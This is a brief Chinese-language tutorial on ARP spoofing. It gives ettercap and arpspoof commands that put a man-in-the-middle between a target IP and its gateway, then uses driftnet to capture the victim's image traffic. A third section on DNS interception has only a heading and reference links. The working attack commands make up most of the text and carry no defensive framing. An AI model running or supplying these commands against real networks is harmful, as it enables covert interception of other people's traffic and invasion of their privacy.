1.利用ettercap进行arp欺骗:
root权限下打开ettercap:
ettercap -C (curses UI) ettercap -G (GTK+ GUI)
在Kali下命令行输入:
arpspoof -i eth0 -t 192.168.1.106 192.168.1.1
arpspoof的命令参数解释:-i 网卡 -t 目标IP 网关
2.利用ettercap+driftnet截获目标主机的图片数据流
打开一个终端窗,root权限执行:
ettercap -i wlan0 -Tq -M arp:remote /192.168.1.107/ /192.168.1.1/ #对目标主机进行arp欺骗
新建一个终端窗口,执行:
driftnet -i wlan0 #监听wlan0
3.利用ettercap+dns截获目标主机访问
引用:http://www.secpulse.com/archives/6068.html
http://www.3fwork.com/b506/000099MYM019924/
https://huirong.github.io/2015/03/25/arpspoof/